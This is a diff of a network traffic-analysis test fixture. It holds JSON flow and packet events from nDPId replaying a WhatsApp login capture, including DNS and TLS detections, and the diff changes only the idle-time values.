+00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":29,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1432582224240,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1432582224240,"pkt":"xiwDYGpkAPS5Jrv0CABFAAA06DdAAEAGqtPAqAIEXbqHUsAVAFCuhm784V0pF4AQIEUhrwAAAQEICi36IpNY+Pss"} +00596{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1432582224258,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":151,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":151,"pkt_l4_len":117,"thread_ts_msec":1432582224258,"pkt":"APS5Jrv0xiwDYGpkCABFAACJJDcAADkG7nUXMpTkwKgCBAG7wBTRmfKoS8+iLoAYAghwjQAAAQEIChFecist+iKKFQMDAFAv7dNuXnOpK1CdvNYEt52MdeH58dywqIMfN+GfFSQKoHdGcEPHPIYnDd6I8bRCtU0lSoikjPCdTCArNmgRywMWXqpqGQcfgITTy3erXmajWw=="} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1432582224259,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1432582224259,"pkt":"APS5Jrv0xiwDYGpkCABFAAA0JDgAADkG7skXMpTkwKgCBAG7wBTRmfL9S8+iLoARAgi9fgAAAQEIChFecist+iKK"} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":34,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1432582224263,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1432582224263,"pkt":"APS5Jrv0xiwDYGpkCABFAAA0UnIAADkGPNoFsioawKgCBABQwBZ503WfeS7N5oARAeY3ugAAAQEICmSSnpkt+iKP"} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":35,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1432582224264,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1432582224264,"pkt":"xiwDYGpkAPS5Jrv0CABFAAA0QQVAAEAGB0fAqAIEBbIqGsAWAFB5Ls3medN1oIAQIFAZNgAAAQEICi36Iqlkkp6Z"} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":36,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1432582224347,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432582224347,"pkt":"APS5Jrv0xiwDYGpkCABFAAAopJIAAO4GEX4RrUJmwKgCBAG7wBGTGk\/7nhP2KVARCf9V9QAA"} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":37,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1432582224417,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432582224417,"pkt":"xiwDYGpkAPS5Jrv0CABFAAAoVthAAEAGzTjAqAIEEa1CZsARAbueE\/YpkxpP\/FAQQAAf9AAA"} +00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":38,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582225313,"flow_last_seen":1432582225313,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582225313,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.172.100.53","src_port":49175,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":38,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1432582225313,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432582225313,"pkt":"xiwDYGpkAPS5Jrv0CABFAAAobpJAAEAGk7DAqAIEEaxkNcAXAbvFrXCYlCt1nlAR\/\/91YwAA"} +00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":39,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582225324,"flow_last_seen":1432582225324,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582225324,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.172.100.55","src_port":49165,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":39,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1432582225324,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432582225324,"pkt":"xiwDYGpkAPS5Jrv0CABFAAAoYhRAAEAGoCzAqAIEEaxkN8ANAbtmBk0BJP5uJ1AR\/\/9vTgAA"} +00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":40,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582225329,"flow_last_seen":1432582225329,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582225329,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.130.137.77","src_port":49176,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":40,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1432582225329,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432582225329,"pkt":"xiwDYGpkAPS5Jrv0CABFAAAoYhlAAEAGezvAqAIEEYKJTcAYAbvMgisCtJzpXFARQAC7BQAA"} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":41,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1432582225380,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432582225380,"pkt":"APS5Jrv0xiwDYGpkCABFAAAohYkAAPIG5coRgolNwKgCBAG7wBi0nOlczIIrA1AREADrBAAA"} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":42,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1432582225381,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432582225381,"pkt":"xiwDYGpkAPS5Jrv0CABFAAAoSmNAAEAGkvHAqAIEEYKJTcAYAbvMgisDtJzpXVAQQAC7BAAA"} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1432582225453,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432582225453,"pkt":"APS5Jrv0xiwDYGpkCABFAAAocjAAAO8GIRIRrGQ1wKgCBAG7wBeUK3Wexa1wmVARn\/7VYwAA"} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":44,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1432582225468,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432582225468,"pkt":"APS5Jrv0xiwDYGpkCABFAAAoqzoAAO4G6QURrGQ3wKgCBAG7wA0k\/m4nZgZNAlARn\/7PTgAA"} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":45,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1432582225533,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432582225533,"pkt":"xiwDYGpkAPS5Jrv0CABFAAAoGflAAEAG6EnAqAIEEaxkNcAXAbvFrXCZlCt1n1AQ\/\/91YgAA"} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":46,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1432582225533,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432582225533,"pkt":"xiwDYGpkAPS5Jrv0CABFAAAooItAAEAGYbXAqAIEEaxkN8ANAbtmBk0CJP5uKFAQ\/\/9vTQAA"} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":47,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582227526,"flow_last_seen":1432582227526,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1432582227526,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"192.168.2.1","src_port":51897,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":47,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1432582227526,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"thread_ts_msec":1432582227526,"pkt":"xiwDYGpkAPS5Jrv0CABFAABBdxsAAEARfjvAqAIEwKgCAcq5ADUALb4mNPgBAAABAAAAAAAABXF1ZXJ5A2VzcwVhcHBsZQNjb20AAAEAAQ=="} 00777{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":47,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582227526,"flow_last_seen":1432582227526,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1432582227526,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"192.168.2.1","src_port":51897,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"},"dns": {"query":"query.ess.apple.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} @@ -48,54 +48,54 @@ 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":49,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582227595,"flow_last_seen":1432582227595,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1432582227595,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"192.168.2.1","src_port":52190,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":49,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1432582227595,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1432582227595,"pkt":"xiwDYGpkAPS5Jrv0CABFAAA+I5EAAEAR0cjAqAIEwKgCAcveADUAKv\/L36MBAAABAAAAAAAAA2UxMwh3aGF0c2FwcANuZXQAAAEAAQ=="} 00784{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":49,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582227595,"flow_last_seen":1432582227595,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1432582227595,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"192.168.2.1","src_port":52190,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.WhatsApp","breed":"Acceptable","category":"Chat"},"dns": {"query":"e13.whatsapp.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} -00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":50,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582227604,"flow_last_seen":1432582227604,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1432582227604,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.178.104.12","src_port":49201,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":50,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1432582227604,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1432582227604,"pkt":"xiwDYGpkAPS5Jrv0CABFAABAZF5AAEAGme\/AqAIEEbJoDMAxAbvjm5\/WAAAAALAC\/\/9XjAAAAgQFtAEDAwQBAQgKLfovrgAAAAAEAgAA"} +00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":50,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582227604,"flow_last_seen":1432582227604,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1432582227604,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.178.104.12","src_port":49201,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":50,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1432582227604,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1432582227604,"pkt":"xiwDYGpkAPS5Jrv0CABFAABAZF5AAEAGme\/AqAIEEbJoDMAxAbvjm5\/WAAAAALAC\/\/9XjAAAAgQFtAEDAwQBAQgKLfovrgAAAAAEAgAA"} 00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":51,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1432582227624,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":204,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":204,"pkt_l4_len":170,"thread_ts_msec":1432582227624,"pkt":"APS5Jrv0xiwDYGpkCABFAAC+d\/oAAEARfN\/AqAIBwKgCBAA1y94AqhSs36OBgAABAAgAAAAAA2UxMwh3aGF0c2FwcANuZXQAAAEAAcAMAAEAAQAAC20ABJ5V6TTADAABAAEAAAttAASeVTpKwAwAAQABAAALbQAEuK2zJ8AMAAEAAQAAC20ABJ5VOnfADAABAAEAAAttAAS4rbMlwAwAAQABAAALbQAEnlU6M8AMAAEAAQAAC20ABK4k0i3ADAABAAEAAAttAASeVQXI"} 00800{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":51,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1432582227595,"flow_last_seen":1432582227624,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":162,"flow_tot_l4_payload_len":196,"flow_avg_l4_payload_len":98,"midstream":0,"thread_ts_msec":1432582227624,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"192.168.2.1","src_port":52190,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.WhatsApp","breed":"Acceptable","category":"Chat"},"dns": {"query":"e13.whatsapp.net","num_queries":1,"num_answers":8,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"158.85.233.52"}} -00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":52,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582227643,"flow_last_seen":1432582227643,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1432582227643,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"184.173.179.37","src_port":49202,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":52,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1432582227643,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1432582227643,"pkt":"xiwDYGpkAPS5Jrv0CABFAABACXVAAEAGAsTAqAIEuK2zJcAyFGaCPuKZAAAAALAC\/\/9xPwAAAgQFtAEDAwQBAQgKLfov1AAAAAAEAgAA"} -00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":53,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1432582227797,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1432582227797,"pkt":"APS5Jrv0xiwDYGpkCABFAAA8rYsAADQGqrG4rbMlwKgCBBRmwDLYm8Xcgj7imqAS\/\/9JMQAAAgQFrAEDAwkEAggKD\/GKmy36L9Q="} -00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":54,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582227884,"flow_last_seen":1432582227884,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1432582227884,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.178.104.14","src_port":49203,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":54,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1432582227884,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1432582227884,"pkt":"xiwDYGpkAPS5Jrv0CABFAABAKwpAAEAG00HAqAIEEbJoDsAzAbunfDOjAAAAALAC\/\/\/+yQAAAgQFtAEDAwQBAQgKLfowvwAAAAAEAgAA"} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":55,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":3,"flow_last_seen":1432582227885,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1432582227885,"pkt":"xiwDYGpkAPS5Jrv0CABFAAA0779AAEAGHIXAqAIEuK2zJcAyFGaCPuKa2JvF3YAQIFhWrQAAAQEICi36MMYP8Yqb"} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":56,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1432582227886,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1432582227886,"pkt":"APS5Jrv0xiwDYGpkCABFAAA0rZoAAO4G4r4RsmgMwKgCBAG7wDE71dh745uf14ASH\/64\/gAAAgQFoAEDAwQBAQQC"} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":57,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1432582227887,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432582227887,"pkt":"xiwDYGpkAPS5Jrv0CABFAAAo79dAAEAGDo7AqAIEEbJoDMAxAbvjm5\/XO9XYfFAQQADZtwAA"} -00969{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":58,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432582227604,"flow_last_seen":1432582227896,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":190,"flow_tot_l4_payload_len":190,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1432582227896,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.178.104.12","src_port":49201,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"query.ess.apple.com","ja3":"799135475da362592a4be9199d258726","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":60,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1432582228152,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1432582228152,"pkt":"APS5Jrv0xiwDYGpkCABFAAA0UDkAAO4GQB4RsmgOwKgCBAG7wDON4auhp3wzpIASH\/48GwAAAgQFoAEDAwQBAQQC"} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":61,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1432582228167,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432582228167,"pkt":"xiwDYGpkAPS5Jrv0CABFAAAoC8AAAEAGMqTAqAIEEbJoDsAzAbunfDOkAAAAAFAEAADWZAAA"} -01291{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":64,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1432582227604,"flow_last_seen":1432582228181,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3601,"flow_avg_l4_payload_len":514,"midstream":0,"thread_ts_msec":1432582228181,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.178.104.12","src_port":49201,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"query.ess.apple.com","server_names":"*.ess.apple.com","ja3":"799135475da362592a4be9199d258726","ja3s":"c253ec3ad88e42f8da4032682892f9a0","unsafe_cipher":2,"cipher":"TLS_RSA_WITH_RC4_128_MD5","issuerDN":"CN=Apple Server Authentication CA, OU=Certification Authority, O=Apple Inc., C=US","subjectDN":"CN=*.ess.apple.com, OU=ISG Delivery Ops, O=Apple Inc., C=US","fingerprint":"BD:E0:62:C3:F2:9D:09:5D:52:D4:AA:60:11:1B:36:1B:03:24:F1:9B"}} -00601{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":72,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582228503,"flow_last_seen":1432582228503,"flow_idle_time":7440000,"flow_min_l4_payload_len":1440,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1440,"flow_avg_l4_payload_len":1440,"midstream":1,"thread_ts_msec":1432582228503,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.110.229.14","src_port":49193,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 